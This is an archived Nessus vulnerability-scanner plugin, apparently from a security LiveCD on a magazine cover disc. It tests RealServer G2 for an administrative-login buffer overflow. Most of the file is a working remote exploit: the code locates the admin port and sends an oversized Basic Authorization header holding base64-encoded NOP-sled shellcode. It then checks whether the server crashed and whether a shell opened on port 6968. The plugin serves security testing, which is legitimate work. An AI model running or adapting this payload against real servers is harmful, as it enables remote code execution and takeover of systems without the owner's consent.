home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / realserverg2.nasl < prev    next >
Text File  |  2005-01-14  |  10KB  |  135 lines
  1. #
  2. # This script was written by Renaud Deraison
  4. # Original exploit code : see http://www.beavuh.org
  5. #
  6. # See the Nessus Scripts License for details
  7. #
  8. #
  9. if(description)
  10. {
  11.  script_id(10200);
  12.  script_version ("$Revision: 1.16 $");
  13.  script_cve_id("CAN-1999-0271");
  14.  
  15.  name["english"] = "RealServer G2 buffer overrun";
  16.  name["francais"] = "DΘpassement de buffer dans le serveur RealServer G2";
  17.  script_name(english:name["english"], francais:name["francais"]);
  18.  
  19. desc["english"] = "
  20. If a user sends a too long login/password combination
  21. to the administrative server of a RealServer G2, then
  22. it will overflow the server's buffer.
  23.  
  24. An attacker can use this flaw to execute arbitrary code
  25. on the remote system.
  26.  
  27. Solution : filter incoming traffic to the administrative port
  28. of the real server G2
  29. Risk factor : High";
  30.  
  31.  
  32.  
  33. desc["francais"] = "
  34. Si un utilisateur envoie une trop longue paire login/password
  35. au serveur administratif de RealServer G2, alors il
  36. dΘpassera le buffer du serveur.
  37.  
  38. Un pirate peut utiliser ce problΦme pour faire executer du
  39. code arbitraire au systΦme distant.
  40.  
  41. Solution  : filtrez le traffic entrant vers le port
  42. administratif
  43. Facteur de risque : ElevΘ";
  44.  
  45.  script_description(english:desc["english"], francais:desc["francais"]);
  46.  
  47.  summary["english"] = "Overflows a buffer in RealServer G2";
  48.  script_summary(english:summary["english"]);
  49.  
  50.  script_category(ACT_DESTRUCTIVE_ATTACK);
  51.  
  52.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison. Original exploit : www.beavuh.org");
  53.  family["english"] = "Gain root remotely";
  54.  family["francais"] = "Passer root α distance";
  55.  script_family(english:family["english"], francais:family["francais"]);
  56.  
  57.  script_dependencies("find_service.nes");
  58.  script_require_ports(7070, "Services/realserver");
  59.  exit(0);
  60. }
  61.  
  62. include("http_func.inc");
  63.  
  64. port7070 = get_kb_item("Services/realserver");
  65. if(!port7070)port7070 = 7070;
  66.  
  67. if(get_port_state(port7070))
  68. {
  69.   #
  70.   # A real server is running. Now, let's use the
  71.   # result of the port scan to find the admin port
  72.   #
  73.   if(http_is_dead(port:port7070))exit(0);
  74.   
  75.  
  76.   i = 1024;
  77.   admin = 0;
  78.  
  79.   while(!admin)
  80.   {
  81.    i = i+1;
  82.    if(get_port_state(i))
  83.    {
  84.     soc = open_sock_tcp(i);
  85.     if(soc)
  86.     {
  87.      req = http_get(item:"/admin/index.html", port:i);
  88.      send(socket:soc, data:req);
  89.      r = http_recv(socket:soc);
  90.      if(r)
  91.      {
  92.       if("Unauthorized" >< r)admin = i;
  93.      }
  94.     http_close_socket(soc);
  95.     }
  96.    }
  97.    if(i > 65535)exit(0);
  98.   }
  99.   
  100.   if(admin)
  101.   {
  102.   head = "GET /admin/index.html HTTP/1.0\r\n" +
  103.      "Connection: Keep-Alive\r\n" +
  104.      "User-Agent: Mozilla/4.04  (X11; I; Beavuh OS .9 i486; Nav)\r\n"+
  105.         "Host: 111.111.11.1:1111\r\n" + 
  106.      "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\n"+
  107.     "Accept-Language: en\r\n"+
  108.     "Accept-Charset: iso-8859-1,*,utf-8\r\n"+
  109.     "Authorization: Basic ";
  110. mid = "kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ6wiQkJBXRToAkJCQkJCQkJCQkJCQkJCQkIt0JPiL/jPAUPfQUFnyr1mxxovHSIAwmeL6M/aWu5mcQEbB6whW/xOL0PwzybELSTLArITAdflSUVZSs5T/E6tZWuLsMsCshMB1+bOcVv8Ti9D8M8mxBjLArITAdflSUVZSs5T/E6tZWuLsg8YFM8BQQFBAUP9X6JNqEFZT/1fsagJT/1fwM8BXULAMq1irQKtfSFBXVq1W/1fASFBXrVatVv9XwEiwRIkHV/9XxDPAi0b0iUc8iUdAiwaJRzgzwGa4AQGJRyxXVzPAUFBQQFBIUFCtVjPAUP9XyP928P9XzP92/P9XzEhQUFP/V/SL2DPAtARQwegEUP9X1IvwM8CLyLUEUFBXUVD/d6j/V9CDPwF8IjPAUFf/N1b/d6j/V9wLwHQvM8BQ/zdWU/9X+GpQ/1fg68gzwFC0BFBWU/9X/FczyVFQVv93rP9X2GpQ/1fg66pQ/1fkkNLcy9fc1aqrmdrr/Pjt/Mnw6fyZ3vztyu346+3s6dD3//bYmdrr/Pjt/Mnr9vr86urYmdr19ur80fj3/fX8mcn8/PLX+PT8/cnw6fyZ3vX2+/j12PX19vqZzuvw7fzf8PX8mcv8+P3f8PX8mcr1/Pzpmdzh8O3J6/b6/Orqmc7K1trSqquZ6vb68vztmfvw9/2Z9fDq7fz3mfj6+vzp7Znq/Pf9mev8+u+Zm5mCoZmZmZmZmZmZmZmZmfr0/bf84fyZ/////w==";
  111.    tail = "\r\n\r\n";
  112.    str = string(head, mid, tail);
  113.    soc = open_sock_tcp(admin);
  114.    if(soc)
  115.    {
  116.     send(socket:soc, data:str);
  117.     close(soc);
  118.     sleep(1);
  119.     soc2 = open_sock_tcp(admin);
  120.     send(socket:soc2, data:req);
  121.     rep = http_recv(socket:soc2);
  122.     if(!rep)
  123.     {
  124.     security_hole(admin);
  125.     soc3 = open_sock_tcp(6968);
  126.     if(soc3)
  127.      {
  128.      security_hole(port:6968, data:"We could open a shell on this port, thanks to the RealG2 overflow");
  129.      close(soc3);
  130.      }
  131.     }
  132.    }
  133.   }
  134. }
  135.